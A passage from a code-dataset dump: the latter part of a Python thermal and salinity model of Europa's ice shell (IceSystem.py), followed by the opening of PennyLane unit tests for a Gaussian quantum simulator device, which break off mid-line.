NOTE: Must use Reflecting boundary condition for sides if using this\n\t\t\tissalt : bool\n\t\t\t\tdeclare whether salinity will be used in this system, necessary for declaring fit functions and\n\t\t\t\tmelting temperature calculations\n\t\tUsage:\n\t\t\tIce Shell is 40 km thick and 40 km wide at a spatial discretization of 50 m.\n\t\t\t\tmodel = IceSystem(40e3, 40e3, 50, 50)\n\n\t\t\tSee README\n\t\t\"\"\"\n\n\t\tself.Lx, self.Lz = Lx, Lz\n\t\tself.dx, self.dz = dx, dz\n\t\tself.nx, self.nz = int(Lx / dx + 1), int(Lz / dz + 1)\n\t\tself.Z = np.array([j * dz for j in range(self.nz)], dtype=float) # positive down\n\t\tif use_X_symmetry:\n\t\t\tself.symmetric = True\n\t\t\tself.Lx = self.Lx / 2\n\t\t\tself.nx = int(self.Lx / self.dx + 1)\n\t\t\tself.X = np.array([i * dx for i in range(self.nx)], dtype=float)\n\t\t\tself.X, self.Z = np.meshgrid(self.X, self.Z) # create spatial grid\n\t\telif use_X_symmetry is False:\n\t\t\tself.X = np.array([-Lx / 2 + i * dx for i in range(self.nx)], dtype=float) # x domain centered on 0\n\t\t\tself.X, self.Z = np.meshgrid(self.X, self.Z, dtype=float) # create spatial grid\n\t\tself.T = np.zeros((self.nz, self.nx), dtype=float) # initialize domain at one temperature\n\t\tself.S = np.zeros((self.nz, self.nx), dtype=float) # initialize domain with no salt\n\t\tself.phi = np.zeros((self.nz, self.nx), dtype=float) # initialize domain as ice\n\t\tself.kT, self.cpT = kT, cpT # k(T), cp_i(T) I/O\n\t\tself.issalt = False # salt I/O\n\n\tclass constants:\n\t\t\"\"\"\n\t\tNo-methods class used for defining constants in a simulation. May be changed inside here or as an\n\t\tinstance during simulation runs.\n\t\t\"\"\"\n\t\tstyr = 3.154e7 # s/yr, seconds in a year\n\n\t\tg = 1.32 # m/s2, Europa surface gravity\n\n\t\t# Thermal properties\n\t\trho_i = 917. # kg/m3, pure ice density\n\t\trho_w = 1000. # kg/m3 pure water density\n\t\tcp_i = 2.11e3 # J/kgK, pure ice specific heat\n\t\tcp_w = 4.19e3 # J/kgK, pure water specific heat\n\t\tki = 2.3 # W/mK, pure ice thermal conductivity\n\t\tkw = 0.56 # W/mK, pure water thermal conductivity\n\t\tac = 567 # W/m, ice thermal conductivity constant, ki = ac/T (Klinger, 1980)\n\t\tTm = 273.15 # K, pure ice melting temperature at 1 atm\n\t\tLf = 333.6e3 # J/kg, latent heat of fusion of ice\n\t\texpans = 1.6e-4 # 1/K, thermal expansivity of ice\n\n\t\trho_s = 0. # kg/m3, salt density, assigned only when salinity is used\n\n\t\t# Radiation properties\n\t\temiss = 0.97 # pure ice emissivity\n\t\tstfblt = 5.67e-8 # W/m2K4 Stefan-Boltzman constant\n\n\t\t# Constants for viscosity dependent tidal heating\n\t\t# from Mitri & Showman (2005)\n\t\tact_nrg = 26. # activation energy for diffusive regime\n\t\tQs = 60e3 # J/mol, activation energy of ice (Goldsby & Kohlstadt, 2001)\n\t\tRg = 8.3144598 # J/K*mol, gas constant\n\t\teps0 = 1e-5 # maximum tidal flexing strain\n\t\tomega = 2.5e-5 # 1/s, tidal flexing frequency\n\t\tvisc0i = 1e13 # Pa s, minimum reference ice viscosity at T=Tm\n\t\tvisc0w = 1.3e-3 # Pa s, dynamic viscosity of water at 0 K\n\n\t\t# Mechanical properties of ice\n\t\tG = 3.52e9 # Pa, shear modulus/rigidity (Moore & Schubert, 2000)\n\t\tE = 2.66 * G # Pa, Young's Modulus\n\n\tdef save_initials(self):\n\t\t\"\"\" Save initial values to compare with simulation results. \"\"\"\n\t\tself.T_initial = self.T.copy()\n\t\tself.Tm_initial = self.Tm.copy()\n\t\tself.phi_initial = self.phi.copy()\n\t\tself.S_initial = self.S.copy()\n\n\t\tif self.kT:\n\t\t\tself.k_initial = self.phi_initial * self.constants.kw + (1 - self.phi_initial) * \\\n\t\t\t self.constants.ac / self.T_initial\n\t\telse:\n\t\t\tself.k_initial = self.phi_initial * self.constants.kw + (1 - self.phi_initial) * self.constants.ki\n\n\tdef init_volume_averages(self):\n\t\t\"\"\"\n\t\tInitialize volume averaged values over the domain. In practice, this is automatically called by any future\n\t\tfunction that are changing physical parameters such as liquid fraction, salinity or temperature.\n\t\t\"\"\"\n\t\tif self.kT:\n\t\t\tself.k = (1 - self.phi) * (self.constants.ac / self.T) + self.phi * self.constants.kw\n\t\telse:\n\t\t\tself.k = (1 - self.phi) * self.constants.ki + self.phi * self.constants.kw\n\n\t\tif self.cpT == \"GM89\":\n\t\t\t\"Use temperature-dependent specific heat for pure ice from Grimm & McSween 1989\"\n\t\t\tself.cp_i = 185. + 7.037 * self.T\n\t\telif self.cpT == \"CG10\":\n\t\t\t\"Use temperature-dependent specific heat for pure ice from Choukroun & Grasset 2010\"\n\t\t\tself.cp_i = 74.11 + 7.56 * self.T\n\t\telse:\n\t\t\tself.cp_i = self.constants.cp_i\n\n\t\t# this is very unimportant overall\n\t\tif self.issalt:\n\t\t\tself.rhoc = (1 - self.phi) * (self.constants.rho_i + self.Ci_rho * self.S) * self.cp_i \\\n\t\t\t + self.phi * (self.constants.rho_w + self.C_rho * self.S) * self.constants.cp_w\n\n\t\telse:\n\t\t\tself.rhoc = (1 - self.phi) * self.constants.rho_i * self.cp_i \\\n\t\t\t + self.phi * self.constants.rho_w * self.constants.cp_w\n\n\t\tself.save_initials()\n\n\tdef init_T(self, Tsurf, Tbot, profile='non-linear', real_Lz=0):\n\t\t\"\"\"\n\t\tInitialize temperature profile\n\t\t\tParameters:\n\t\t\t\tTsurf : float\n\t\t\t\t\tsurface temperature\n\t\t\t\tTbot : float\n\t\t\t\t\ttemperature at bottom of domain\n\t\t\t\tprofile : string\n\t\t\t\t\t-> defaults to 'non-linear'\n\t\t\t\t\tprescribed temperature profile\n\t\t\t\t\t'non-linear' -- expected equilibrium thermal gradient with k(T)\n\t\t\t\t\t'linear' -- equilibirium thermal gradient for constant k\n\t\t\t\t\t'stefan' -- sets up the freezing stefan problem temperature profile\n\t\t\t\t\t\t\t\t\tin this instance, Tbot should be the melting temperature\n\t\t\t\treal_Lz : float\n\t\t\t\t\tused if you want to simulate some portion of a much larger shell, so this parameter is used to\n\t\t\t\t\tmake the temperature profile that of the much larger shell than the one being simulated.\n\t\t\t\t\tFor example, a 40 km conductive shell (real_Lz = 40e3) discretized at 10 m can be computationally\n\t\t\t\t\texpensive.However, if we assume that any temperature anomaly at shallow depths (~1-5km) won't\n\t\t\t\t\treach to 40km within the model time, we can reduce the computational domain to ~5km to speed up\n\t\t\t\t\tthe simulation. This will take the Tbot as the Tbot of a 40km and find the temperature at 5km to\n\t\t\t\t\taccount for the reduced domain size.\n\t\t\t\t\tUsage case down below\n\t\t\tReturns:\n\t\t\t\tT : (nz,nx) grid\n\t\t\t\t\tgrid of temperature values\n\n\t\t\tUsage :\n\t\t\t\tDefault usage:\n\t\t\t\t\tmodel.init_T(Tsurf=75, Tbot=273.15)\n\n\t\t\t\tLinear profile:\n\t\t\t\t\tmodel.init_T(Tsurf = 50, Tbot = 273.15, profile='linear')\n\n\t\t\t\tCheated domain:\n\t\t\t\t\trealLz = 50e3\n\t\t\t\t\tmodelLz = 5e3\n\t\t\t\t\tmodel = IceSystem(Lz=modelLz, ...)\n\t\t\t\t\tmodel.init_T(Tsurf=110,Tbot=273.15,real_lz=realLz)\n\t\t\"\"\"\n\t\t# set melting temperature to default\n\t\tself.Tm = self.constants.Tm * np.ones(self.X.shape)\n\n\t\tif isinstance(profile, str):\n\t\t\tif profile == 'non-linear':\n\t\t\t\tif real_Lz > 0:\n\t\t\t\t\tTbot = Tsurf * (Tbot / Tsurf) ** (self.Lz / real_Lz)\n\t\t\t\tself.T = Tsurf * (Tbot / Tsurf) ** (abs(self.Z / self.Lz))\n\n\t\t\telif profile == 'linear':\n\t\t\t\tif real_Lz > 0:\n\t\t\t\t\tTbot = (Tbot - Tsurf) * (self.Lz / real_Lz) + Tsurf\n\t\t\t\tself.T = (Tbot - Tsurf) * abs(self.Z / self.Lz) + Tsurf\n\n\t\t\telif profile == 'stefan':\n\t\t\t\tself.T[0, :] = Tsurf # set the very top of grid to surface temperature\n\t\t\t\tself.T[1:, :] = Tbot # everything below is at the melting temperature\n\t\t\t\tself.phi[1:, :] = 1 # everything starts as liquid\n\t\t\t\tprofile += ' plus domain all water'\n\n\t\t\tprint('init_T(Tsurf = {}, Tbot = {})'.format(Tsurf, Tbot))\n\t\t\tprint('\\t Temperature profile initialized to {}'.format(profile))\n\n\t\telse:\n\t\t\tself.T = profile\n\t\t\tprint('init_T: custom profile implemented')\n\n\t\t# save boundaries for dirichlet or other\n\t\t# left and right boundaries\n\t\tself.TtopBC = self.T[0, :]\n\t\tself.TbotBC = self.T[-1, :]\n\t\tself.Tedge = self.T[:, 0] = self.T[:, -1]\n\t\tself.Tsurf = Tsurf\n\t\tself.Tbot = Tbot\n\t\tself.init_volume_averages()\n\n\tdef set_intrusion_geom(self, depth, thickness, radius, geometry='ellipse'):\n\t\t\"\"\"\n\t\tSets geometry of intrusion. In practice, is automatically called by init_intrusion() and generally unneeded\n\t\tto be called in simulation script. Creates tuple IceSystem.geom that holds the initial intrusion grid indices for\n\t\tmanipulation inside simulation and outside for more customization.\n\t\t\"\"\"\n\n\t\tif isinstance(geometry, str):\n\t\t\tif geometry == 'ellipse':\n\t\t\t\tcenter = thickness / 2 + depth\n\t\t\t\ttry:\n\t\t\t\t\tif self.symmetric: # adjust geometry to make sure the center of the intrusion isn't on the boundary\n\t\t\t\t\t\t_R_ = self.X - self.dx\n\t\t\t\t\t\tthickness += self.dz\n\t\t\t\texcept AttributeError:\n\t\t\t\t\t_R_ = self.X\n\t\t\t\tself.geom = np.where((_R_ / radius) ** 2 + (self.Z - center) ** 2 / ((thickness / 2) ** 2) <= 1)\n\t\t\t# del center, _R_\n\t\t\telif geometry == 'box':\n\t\t\t\ttry:\n\t\t\t\t\tif self.symmetric: # adjust geometry to make sure the center of the intrusion isn't on the boundary\n\t\t\t\t\t\tradius += self.dx\n\t\t\t\texcept AttributeError:\n\t\t\t\t\tradius = radius\n\t\t\t\tr = np.where(abs(self.X[0, :]) <= radius)[0]\n\t\t\t\tz = np.intersect1d(np.where(self.Z[:, 0] <= thickness + depth), np.where(self.Z[:, 0] >= depth))\n\t\t\t\ttmp = np.zeros(self.T.shape)\n\t\t\t\ttmp[z.min():z.max(), r.min():r.max() + 1] = 1\n\t\t\t\tself.geom = np.where(tmp == 1)\n\t\t# del tmp, r, z\n\n\t\t# option for a custom geometry\n\t\telse:\n\t\t\tself.geom = geometry\n\n\tdef init_intrusion(self, T, depth, thickness, radius, phi=1, geometry='ellipse'):\n\t\t\"\"\"\n\t\tInitialize intrusion properties. Updates volume averages after initialization: means we can just initialize\n\t\ttemperature and intrusion to get all thermal properties set.\n\t\t**So far this only accounts for a single intrusion at the center of the domain\n\t\t\tshould be simple to add multiples in the future if necessary\n\n\t\tParameters:\n\t\t\tT : float\n\t\t\t\tset intrusion to single Temperature value, assuming that it is well mixed\n\t\t\tdepth : float\n\t\t\t\tset depth of upper edge of the intrusion, m\n\t\t\tthickness : float\n\t\t\t\tset thickness of intrusion, m\n\t\t\tradius : float\n\t\t\t\tset radius of intrusion, m\n\t\t\tphi : float [0,1]\n\t\t\t\tset liquid fraction of intrusion, generally interested in totally liquid bodies so default = 1\n\t\t\tgeometry : string (see set_intrusion_geom()), array\n\t\t\t\tset geometry of intrusion, default is an ellipse\n\n\t\tUsage:\n\t\t\tIntrusion at pure water melting temperature (273.15 K), emplaced at 2 km depth in the shell, 2 km thick\n\t\t\tand a radius of 4 km:\n\t\t\t\tmodel.init_intrusion(T=273.15, depth=2e3, thickness=2e3, radius=4e3)\n\t\t\"\"\"\n\n\t\tif phi < 0 or phi > 1:\n\t\t\traise Exception('liquid fraction must be between 0 and 1')\n\n\t\t# save intrusion properties\n\t\tself.T_int = T\n\t\tself.depth, self.thickness, self.R_int = depth, thickness, radius\n\t\tself.set_intrusion_geom(depth, thickness, radius, geometry) # get chosen geometry\n\t\tself.T[self.geom] = T # set intrusion temperature to chosen temperature\n\t\tself.phi[self.geom] = phi # set intrusion to chosen liquid fraction\n\t\tself.init_volume_averages() # update volume averages\n\n\t# define a bunch of useful functions for salty systems, unused otherwise\n\t# non-linear fit, for larger dT\n\tdef shallow_fit(self, dT, a, b, c, d):\n\t\treturn a + b * (dT + c) * (1 - np.exp(-d / dT)) / (1 + dT)\n\n\t# linear fit, for small dT\n\tdef linear_fit(self, dT, a, b):\n\t\treturn a + b * dT\n\n\t# FREEZCHEM quadratic fit for liquidus curve\n\tdef Tm_func(self, S, a, b, c):\n\t\treturn a * S ** 2 + b * S + c\n\n\tdef init_salinity(self, S=None, composition='MgSO4', concentration=12.3, rejection_cutoff=0.25, shell=False,\n\t in_situ=False, T_match=True):\n\t\t\"\"\"\n\t\tInitialize salinity properties for simulations.\n\t\tParameters:\n\t\t\tS : (nz,nx) grid\n\t\t\t\tNecessary for a custom background salinity or other configurations, e.g. a super saline layer\n\t\t\t\t-> though this could be done outside of this command so....\n\t\t\tcomposition : string\n\t\t\t\tChoose which composition the liquid should be.\n\t\t\t\tOptions: 'MgSO4', 'NaCl'\n\t\t\tconcentration : float\n\t\t\t\tInitial intrusion concentration and/or ocean concentration; if using the shell option (below),\n\t\t\t\tthis assumes that the shell was frozen out of an ocean with this concentration and composition\n\t\t\trejection_cutoff : float > 0\n\t\t\t\tLiquid fraction (phi) below which no more salt will be accepted into the remaining liquid or\n\t\t\t\tinterstitial liquid. Note: should be greater than 0\n\t\t\tshell : bool\n\t\t\t\tOption to include background salinity in the shell given the chosen composition and concentration.\n\t\t\t\tThis will automatically adjust the temperature profile to account for a salty ocean near the melting\n\t\t\t\ttemperature. If assuming something else, such as a slightly cooler convecting layer between the\n\t\t\t\tbrittle shell and the ocean, this can be adjusted afterward by calling init_T()\n\t\t\tin_situ : bool\n\t\t\t\tAssumes the intrusion is from an event that melted the shell in-situ, thus have the same\n\t\t\t\tconcentration and composition as the shell at that depth.\n\t\t\tT_match : bool\n\t\t\t\tOption to adjust the temperature profile to make the bottom be at the melting temperature of an ocean\n\t\t\t\twith the same composition and concentration. This is mostly used if making the assumption that the\n\t\t\t\tbrittle layer simulated here is directly above the ocean.\n\n\t\tUsage:\n\t\t\tPure shell, saline intrusion: Intrusion with 34 ppt NaCl salinity\n\t\t\t\tmodel.init_intrusion(composition='NaCl',concentration=12.3)\n\n\t\t\tSaline shell, in-situ melting: Ocean began with 100 ppt MgSO4 and intrusion has been created by in-situ\n\t\t\tmelting\n\t\t\t\tmodel.init_intrusion(composition='MgSO4', concentration=100., shell=True, in_situ=True)\n\t\t\"\"\"\n\t\tif in_situ == True:\n\t\t\tshell = True\n\n\t\tself.issalt = True # turn on salinity for solvers\n\t\tself.saturated = 0 # whether liquid is saturated\n\t\tself.rejection_cutoff = rejection_cutoff # minimum liquid fraction of cell to accept rejected salt\n\n\t\t# composition and concentration coefficients for fits from Buffo et al. (2019)\n\t\t# others have been calculated by additional runs using the model from Buffo et al. (2019)\n\n\t\t# dict structure {composition: [a,b,c]}\n\t\t# Liquidus curves derived from Liquius 1.0 (Buffo et al. 2019 and FREEZCHEM) for MgSO4 and NaCl\n\t\tself.Tm_consts = {'MgSO4': [-1.333489497e-5, -0.01612951864, 273.055175687],\n\t\t 'NaCl': [-9.1969758e-5, -0.03942059, 272.63617665]\n\t\t }\n\n\t\t# dict structure {composition: {concentration: [a,b,c,d]}}\n\t\tself.shallow_consts = {'MgSO4': {0: [0., 0., 0., 0.],\n\t\t 12.3: [12.21, -8.3, 1.836, 20.2],\n\t\t 100: [22.19, -11.98, 1.942, 21.91],\n\t\t 282: [30.998, -11.5209, 2.0136, 21.1628]},\n\t\t 'NaCl': {0: [0., 0., 0., 0.],\n\t\t 10: [7.662, -4.936, 2.106, 24.8],\n\t\t 34: [11.1, -4.242, 1.91, 22.55],\n\t\t 100: [0., 0., 0., 0.],\n\t\t 260: [0., 0., 0., 0.]}\n\t\t }\n\n\t\t# dict structure {composition: {concentration: [a,b]}}\n\t\tself.linear_consts = {'MgSO4': {0: [0., 0.],\n\t\t 12.3: [1.0375, 0.40205],\n\t\t 100: [5.4145, 0.69992],\n\t\t 282: [14.737, 0.62319]},\n\t\t 'NaCl': {0: [0., 0.],\n\t\t 10: [0.6442, 0.2279],\n\t\t 34: [1.9231, 0.33668],\n\t\t 100: [0., 0.],\n\t\t 260: [0., 0.]}\n\t\t }\n\n\t\t# dict structure {composition: {concentration: [a,b,c]}}\n\t\tself.depth_consts = {'MgSO4': {12.3: [1.0271, -74.0332, -4.2241],\n\t\t 100: [5.38, -135.096, -8.2515],\n\t\t 282: [14.681, -117.429, -5.4962]},\n\t\t 'NaCl': {10: [0., 0., 0.],\n\t\t 34: [1.8523, -72.4049, -10.6679],\n\t\t 100: [0., 0., 0.],\n\t\t 260: [0., 0., 0.]}\n\t\t }\n\n\t\t# create dictionary of root to switch between shallow and linear fits\n\t\t# dict structure {chosen composition: {concentration: root}}\n\t\tself.linear_shallow_roots = {composition: {}}\n\t\tfor key in self.linear_consts[composition]:\n\t\t\tself.linear_shallow_roots[composition][key] = optimize.root(lambda x:\n\t\t\t self.shallow_fit(x, *\n\t\t\t self.shallow_consts[composition][key]) \\\n\t\t\t - self.linear_fit(x, *\n\t\t\t self.linear_consts[composition][key]), 3)['x'][\n\t\t\t\t0]\n\n\t\tself.composition = composition\n\t\tself.concentration = concentration\n\n\t\tif self.composition == 'MgSO4':\n\t\t\t# Liquidus curve derived from Liquius 1.0 (Buffo et al. 2019 and FREEZCHEM) for MgSO4\n\t\t\t# changing from lambda notation to def notation for better pickling?\n\n\t\t\t# def self.Tm_func = lambda S: (-(1.333489497 * 1e-5) * S ** 2) - 0.01612951864 * S + 273.055175687\n\t\t\t# density changes for water w/ concentration of salt below\n\t\t\tself.C_rho = 1.145\n\t\t\tself.Ci_rho = 7.02441855e-01\n\n\t\t\tself.saturation_point = 282. # ppt, saturation concentration of MgSO4 in water\n\t\t\tself.constants.rho_s = 2660. # kg/m^3, density of MgSO4\n\n\t\telif self.composition == 'NaCl':\n\t\t\t# Liquidus curve derived from Liquius 1.0 (Buffo et al. 2019 and FREEZCHEM) for NaCl\n\t\t\t# linear fit for density change due to salinity S\n\t\t\tself.C_rho = 0.8644\n\t\t\tself.Ci_rho = 6.94487270e-01\n\n\t\t\tself.saturation_point = 260. # ppt, saturation concentration of NaCl in water\n\t\t\tself.constants.rho_s = 2160. # kg/m^3, density of NaCl\n\n\t\t# save array of concentrations for chosen composition for entraining salt in ice\n\t\tself.concentrations = np.sort([key for key in self.shallow_consts[composition]])\n\n\t\tif S is not None:\n\t\t\t# method for custom salinity + brine inclusion\n\t\t\tself.S = S\n\t\t\tself.S += self.phi * concentration\n\n\t\tif shell:\n\t\t\t# method for a salinity/depth profile via Buffo et al. 2019\n\t\t\ts_depth = lambda z, a, b, c: a + b / (c - z)\n\t\t\tself.S = s_depth(self.Z, *self.depth_consts[composition][concentration])\n\n\t\t\tif in_situ is False: # for water emplaced in a salty shell\n\t\t\t\tself.S[self.geom] = concentration\n\t\t\telse: # must redistribute the salt evenly to simulate real in-situ melting\n\t\t\t\tprint('Redistributing salt in intrusion')\n\t\t\t\ttry:\n\t\t\t\t\tS_int_tot = self.S[self.geom].sum()\n\t\t\t\t\tself.S[self.geom] = S_int_tot / np.shape(self.geom)[1]\n\t\t\t\t\tif self.S[self.geom].sum() / S_int_tot > 1.0 + 1e-15 or \\\n\t\t\t\t\t\t\tself.S[self.geom].sum() / S_int_tot < 1.0 - 1e-15:\n\t\t\t\t\t\tprint('S_int_new/Si =', self.S[self.geom].sum() / S_int_tot)\n\t\t\t\t\t\traise Exception('problem with salt redistribution')\n\t\t\t\texcept AttributeError:\n\t\t\t\t\tpass\n\t\t\t\tprint('-- New intrusion salinity: {} ppt'.format(self.S[self.geom[0][0], self.geom[1][0]]))\n\n\t\t\t# update temperature profile to reflect bottom boundary condition\n\t\t\tif T_match:\n\t\t\t\tself.Tbot = self.Tm_func(s_depth(self.Lz, *self.depth_consts[composition][concentration]),\n\t\t\t\t *self.Tm_consts[composition])\n\t\t\t\tprint('-- Adjusting temperature profile: Tsurf = {}, Tbot = {}'.format(self.Tsurf, self.Tbot))\n\t\t\t\tself.init_T(Tsurf=self.Tsurf, Tbot=self.Tbot)\n\t\t\telse:\n\t\t\t\tpass\n\n\t\telse:\n\t\t\t# homogeneous brine, pure ice shell\n\t\t\tself.S = self.phi * concentration\n\n\t\t\tif T_match:\n\t\t\t\tself.Tbot = self.Tm_func(concentration, *self.Tm_consts[composition])\n\t\t\t\tprint('--Pure shell; adjusting temperature profile: Tsurf = {}, Tbot = {}'.format(self.Tsurf,\n\t\t\t\t self.Tbot))\n\t\t\t\tself.init_T(Tsurf=self.Tsurf, Tbot=self.Tbot)\n\t\t\telse:\n\t\t\t\tpass\n\n\t\t# update initial melting temperature\n\t\tself.Tm = self.Tm_func(self.S, *self.Tm_consts[composition])\n\t\t# update volume average with included salt\n\t\tself.init_volume_averages()\n\t\t# begin tracking mass\n\t\tself.total_salt = [self.S.sum()]\n\t\t# begin tracking amount of salt removed from system\n\t\tself.removed_salt, self.mass_removed, self.ppt_removed = [0], [0], [0]\n\t\tself.wat_vol = [self.geom[1].shape[0]]\n\n\t\t# update temperature of liquid to reflect salinity\n\t\ttry:\n\t\t\tself.T_int = self.Tm_func(self.S[self.geom], *self.Tm_consts[composition])[0]\n\t\t\tprint('--Updating intrusion temperature to reflect initial salinity, Tint =', self.T_int)\n\t\t\tself.T[self.geom] = self.T_int\n\t\texcept AttributeError:\n\t\t\tpass\n\t\tself.save_initials()\n\n\tdef entrain_salt(self, dT, S, composition):\n\t\t\"\"\"\n\t\tCalculate the amount of salt entrained in newly frozen ice that is dependent on the thermal gradient across\n\t\tthe ice (Buffo et al., in review).\n\t\tParameters:\n\t\t\tdT : float, array\n\t\t\t\ttemperature gradient across cell, or array of temperature gradients\n\t\t\tS : float, array\n\t\t\t\tsalinity (ppt) of newly frozen cell, or array of salinities\n\t\t\tcomposition : string\n\t\t\t\tsalt composition\n\t\t\t\toptions: 'MgSO4', 'NaCl'\n\t\tReturns:\n\t\t\tamount of salt entrained in ice, ppt\n\t\t\tor array of salt entrained in ice, ppt\n\n\t\tUsage:\n\t\t\tSee HeatSolver.update_salinity() function.\n\t\t\"\"\"\n\t\tif isinstance(dT, (int, float)): # if dT (and therefore S) is a single value\n\t\t\tif S in self.shallow_consts[composition]:\n\t\t\t\t# determine whether to use linear or shallow fit\n\t\t\t\tswitch_dT = self.linear_shallow_roots[composition][S]\n\t\t\t\tif dT > switch_dT:\n\t\t\t\t\treturn self.shallow_fit(dT, *self.shallow_consts[composition][S])\n\t\t\t\telif dT <= switch_dT:\n\t\t\t\t\treturn self.linear_fit(dT, *self.linear_consts[composition][S])\n\n\t\t\telse: # salinity not in SlushFund runs\n\t\t\t\t# find which two known concentrations current S fits between\n\t\t\t\tc_min = self.concentrations[S > self.concentrations].max()\n\t\t\t\tc_max = self.concentrations[S < self.concentrations].min()\n\n\t\t\t\t# linearly interpolate between the two concentrations at gradient dT\n\t\t\t\tm, b = np.polyfit([c_max, c_min], [self.entrain_salt(dT, c_max, composition),\n\t\t\t\t self.entrain_salt(dT, c_min, composition)], 1)\n\n\t\t\t\t# return concentration of entrained salt\n\t\t\t\treturn m * S + b\n\n\t\telse: # recursively call this function to fill an array of the same length as input array\n\t\t\treturn np.array([self.entrain_salt(t, s, composition) for t, s in zip(dT, S)], dtype=float)\n","sub_path":"IceSystem.py","file_name":"IceSystem.py","file_ext":"py","file_size_in_byte":23296,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"607057984","text":"# Copyright 2018 Xanadu Quantum Technologies Inc.\r\n\r\n# Licensed under the Apache License, Version 2.0 (the \"License\");\r\n# you may not use this file except in compliance with the License.\r\n# You may obtain a copy of the License at\r\n\r\n# http://www.apache.org/licenses/LICENSE-2.0\r\n\r\n# Unless required by applicable law or agreed to in writing, software\r\n# distributed under the License is distributed on an \"AS IS\" BASIS,\r\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\r\n# See the License for the specific language governing permissions and\r\n# limitations under the License.\r\n\"\"\"\r\nUnit tests for the :mod:`pennylane.plugin.DefaultGaussian` device.\r\n\"\"\"\r\n# pylint: disable=protected-access,cell-var-from-loop\r\nimport unittest\r\nimport inspect\r\nimport logging as log\r\n\r\nfrom scipy.special import factorial as fac\r\nfrom scipy.linalg import block_diag\r\n\r\nfrom defaults import pennylane as qml, BaseTest\r\n\r\nfrom pennylane import numpy as np\r\n\r\nfrom pennylane.plugins.default_gaussian import fock_prob\r\n\r\nfrom pennylane.plugins.default_gaussian import (rotation, squeezing, quadratic_phase,\r\n beamsplitter, two_mode_squeezing,\r\n controlled_addition, controlled_phase)\r\nfrom pennylane.plugins.default_gaussian import (vacuum_state, coherent_state,\r\n squeezed_state, displaced_squeezed_state,\r\n thermal_state)\r\n\r\nfrom pennylane.plugins.default_gaussian import DefaultGaussian\r\n\r\n\r\nlog.getLogger('defaults')\r\n\r\n\r\nU = np.array([[0.83645892-0.40533293j, -0.20215326+0.30850569j],\r\n [-0.23889780-0.28101519j, -0.88031770-0.29832709j]])\r\n\r\n\r\nU2 = np.array([[-0.07843244-3.57825948e-01j, 0.71447295-5.38069384e-02j, 0.20949966+6.59100734e-05j, -0.50297381+2.35731613e-01j],\r\n [-0.26626692+4.53837083e-01j, 0.27771991-2.40717436e-01j, 0.41228017-1.30198687e-01j, 0.01384490-6.33200028e-01j],\r\n [-0.69254712-2.56963068e-02j, -0.15484858+6.57298384e-02j, -0.53082141+7.18073414e-02j, -0.41060450-1.89462315e-01j],\r\n [-0.09686189-3.15085273e-01j, -0.53241387-1.99491763e-01j, 0.56928622+3.97704398e-01j, -0.28671074-6.01574497e-02j]])\r\n\r\n\r\nH = np.array([[1.02789352, 1.61296440-0.3498192j],\r\n [1.61296440+0.3498192j, 1.23920938+0j]])\r\n\r\n\r\nhbar = 2\r\n\r\ndef prep_par(par, op):\r\n \"Convert par into a list of parameters that op expects.\"\r\n if op.par_domain == 'A':\r\n return [np.diag([x, 1]) for x in par]\r\n return par\r\n\r\n\r\nclass TestAuxillaryFunctions(BaseTest):\r\n \"\"\"Tests the auxillary functions\"\"\"\r\n\r\n def setUp(self):\r\n self.hbar = 2.\r\n\r\n # an arbitrary two-mode Gaussian state generated using Strawberry Fields\r\n self.mu = np.array([0.6862, 0.4002, 0.09, 0.558])*np.sqrt(self.hbar)\r\n self.cov = np.array([[0.50750512, -0.04125979, -0.21058229, -0.07866912],\r\n [-0.04125979, 0.50750512, -0.07866912, -0.21058229],\r\n [-0.21058229, -0.07866912, 0.95906208, 0.27133391],\r\n [-0.07866912, -0.21058229, 0.27133391, 0.95906208]])*self.hbar\r\n\r\n # expected Fock state probabilities\r\n self.events = [(0, 0), (0, 1), (1, 1), (2, 3)]\r\n self.probs = [0.430461524043, 0.163699407559, 0.0582788388927, 0.00167706931355]\r\n\r\n def test_fock_prob(self):\r\n \"\"\"Test fock_prob returns the correct Fock probabilities\"\"\"\r\n for idx, e in enumerate(self.events):\r\n res = fock_prob(self.mu, self.cov, e, hbar=self.hbar)\r\n self.assertAlmostEqual(res, self.probs[idx], delta=self.tol)\r\n\r\n\r\nclass TestGates(BaseTest):\r\n \"\"\"Gate tests.\"\"\"\r\n\r\n def test_rotation(self):\r\n \"\"\"Test the Fourier transform of a displaced state.\"\"\"\r\n # pylint: disable=invalid-unary-operand-type\r\n self.logTestName()\r\n\r\n alpha = 0.23+0.12j\r\n S = rotation(np.pi/2)\r\n\r\n # apply to a coherent state. F{x, p} -> {-p, x}\r\n out = S @ np.array([alpha.real, alpha.imag])*np.sqrt(2*hbar)\r\n expected = np.array([-alpha.imag, alpha.real])*np.sqrt(2*hbar)\r\n self.assertAllAlmostEqual(out, expected, delta=self.tol)\r\n\r\n def test_squeezing(self):\r\n \"\"\"Test the squeezing symplectic transform.\"\"\"\r\n self.logTestName()\r\n\r\n r = 0.543\r\n phi = 0.123\r\n S = squeezing(r, phi)\r\n\r\n # apply to an identity covariance matrix\r\n out = S @ S.T\r\n expected = rotation(phi/2) @ np.diag(np.exp([-2*r, 2*r])) @ rotation(phi/2).T\r\n self.assertAllAlmostEqual(out, expected, delta=self.tol)\r\n\r\n def test_quadratic_phase(self):\r\n \"\"\"Test the quadratic phase symplectic transform.\"\"\"\r\n self.logTestName()\r\n\r\n s = 0.543\r\n S = quadratic_phase(s)\r\n\r\n # apply to a coherent state. P[x, p] -> [x, p+sx]\r\n alpha = 0.23+0.12j\r\n out = S @ np.array([alpha.real, alpha.imag])*np.sqrt(2*hbar)\r\n expected = np.array([alpha.real, alpha.imag+s*alpha.real])*np.sqrt(2*hbar)\r\n self.assertAllAlmostEqual(out, expected, delta=self.tol)\r\n\r\n def test_beamsplitter(self):\r\n \"\"\"Test the beamsplitter symplectic transform.\"\"\"\r\n self.logTestName()\r\n\r\n theta = 0.543\r\n phi = 0.312\r\n S = beamsplitter(theta, phi)\r\n\r\n # apply to a coherent state. BS|a1, a2> -> |ta1-r^*a2, ra1+ta2>\r\n a1 = 0.23+0.12j\r\n a2 = 0.23+0.12j\r\n out = S @ np.array([a1.real, a2.real, a1.imag, a2.imag])*np.sqrt(2*hbar)\r\n\r\n T = np.cos(theta)\r\n R = np.exp(1j*phi)*np.sin(theta)\r\n a1out = T*a1 - R.conj()*a2\r\n a2out = R*a2 + T*a1\r\n expected = np.array([a1out.real, a2out.real, a1out.imag, 